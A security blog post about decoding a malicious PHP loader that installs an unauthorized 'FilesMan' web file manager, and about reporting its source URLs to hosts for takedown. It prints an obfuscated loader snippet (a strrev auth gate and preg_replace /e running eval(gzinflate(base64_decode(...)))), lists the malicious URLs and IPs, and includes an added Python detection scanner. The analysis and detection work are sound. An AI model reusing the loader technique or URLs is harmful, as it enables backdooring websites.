File Manager URLs Takedown

11-02-2018


This research was completed in conjunction with another web security professional, Devin LaMarca. He discovered and decoded the malicious files. You can find him at his website here: devinlamarca.com

Devin found this file on a site while looking for malicious activity. He was able to decode the file and discovered that the script is used to install a malicious, unauthorized File Manager onto sites. Once the file manager is installed, it can be used to upload additional files or to search and download existing site files.

In the malicious script, Devin located a list of URLs used to call the File Manager code. We took that list, verified the malicious code on each, and then used that data to initiate takedowns with the hosts.

From the 4 URLs discovered, one had already been taken down due to the violation, and one is hosted with CloudFlare. Unfortunately, getting sites taken down from CloudFlare is an exercise in futility.

The last 2 URLs were still up and hosted on BlueHost and OVH. Both companies have great abuse departments, and I was able to record the violations and send them to their respective abuse teams. This log will be updated once I receive updates from BlueHost and OVH.

Unfortunately, we weren't able to get any relevant crawl data from the hosts. It seems each server may only have one or two.

Original Code (Snippet Only)
Decoded File
$do = 'htua'; if (isset($_REQUEST[strrev($do)])) { // strrev('htua') is 'auth': the loader only runs when an 'auth' request parameter is present
$color = "#df5";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';
// The hex-escaped replacement string decodes to eval(gzinflate(base64_decode('...'))); with the deprecated /e modifier,
// preg_replace evaluates that replacement as PHP, which unpacks and executes the embedded file manager.
preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F
\x64\x65\x28'7X1re9s2z/Dn9VcwmjfZq+PYTtu7s2MnaQ5t2jTpcugp6ePJsmxrkS1PkuNkWf77C4CkREqy43S738N1vbufp7FIEARJkARBAHT7xRVnNIlui4XO6
d7Jx72TC/PN2dmHzjl8dbZf7x2dmd9KJXbHCtPQCbYHzjgKWYtZQWDdFo3Xvj/wHKPMjFNvGkzwx/vTo1d+hL9cq2MF9tC9dgL8/GKNe84N/jqxRl0PEktN5vaLk8A
ZdEZWZA+L5prJKswdTTy/5xTNv82yWm0J8sw1FxMfoHXoWD0nKFLuWq1SZc+qz9iRH7F9fzrumVCvc+NGTXYP/9tyx24ndKKi6QSBH3Q8f2CWj84PDwEqyYPUDuWHZ
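To find this loader pattern in other files, here is an added Python scanner (example code, not from the original post or from Devin's decoding work) that resolves the \xNN escapes, flags the preg_replace /e modifier and the eval(gzinflate(base64_decode( chain, and reverses strrev() keys; the sample input is constructed from the decoded snippet above with the payload truncated.

```python
import re

# Constructed sample modelled on the decoded loader above (payload truncated on purpose).
SAMPLE_PHP = r"""<?php
$do = 'htua'; if (isset($_REQUEST[strrev($do)])) {
$default_action = 'FilesMan';
preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'7X1re9s2z...'\x29\x29\x29\x3B","");
}"""

HEX_ESCAPE = re.compile(r"\\x([0-9A-Fa-f]{2})")
# first argument of preg_replace: quote, delimiter, body, same delimiter, modifiers, quote
PREG_E = re.compile(r"""preg_replace\s*\(\s*(['"])([^\w\s])(.*?)\2([A-Za-z]*)\1""")
STRREV = re.compile(r"strrev\s*\(\s*([^)]+?)\s*\)")
ASSIGN = re.compile(r"\$(\w+)\s*=\s*'([^']*)'")


def unescape_hex(src: str) -> str:
    """Resolve PHP \\xNN escapes so a hex-spelled eval(...) becomes readable."""
    return HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), src)


def scan_php_source(src: str) -> list[str]:
    """Return the indicators of the loader pattern shown on this page found in src."""
    findings = []
    text = unescape_hex(src)
    flat = re.sub(r"\s+", "", text)          # ignore spacing between tokens
    if "eval(gzinflate(base64_decode(" in flat:
        findings.append("eval(gzinflate(base64_decode(...))) unpack-and-execute chain")
    for m in PREG_E.finditer(text):
        if "e" in m.group(4):                # /e evaluates the replacement as PHP
            findings.append(f"preg_replace with /e modifier: {m.group(0)[:40]}")
    # Resolve strrev() of a single-quoted literal, or of a variable assigned one
    assigns = dict(ASSIGN.findall(text))
    for arg in STRREV.findall(text):
        literal = assigns.get(arg[1:]) if arg.startswith("$") else arg.strip("'\"")
        if literal is not None:
            findings.append(f"strrev obfuscation: {arg} -> {literal[::-1]!r}")
    if "FilesMan" in text:
        findings.append("FilesMan default_action marker")
    return findings


if __name__ == "__main__":
    for finding in scan_php_source(SAMPLE_PHP):
        print(finding)
```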
URL Data

URL                            Domain         IP               Host
http://netnet44.net/s          netnet44.net   192.99.37.147    ovh.ca
http://simbersa.com/s.txt      simbersa.com   162.241.218.100  box5554.bluehost.com
http://micwar.com/content.txt  micwar.com     74.220.199.6     parking.bluehost.com
http://odintara.com/s          odintara.com   104.31.93.17     cloudflare.com

Screen Shots






© 2019 Dixon Ryder All Rights Reserved.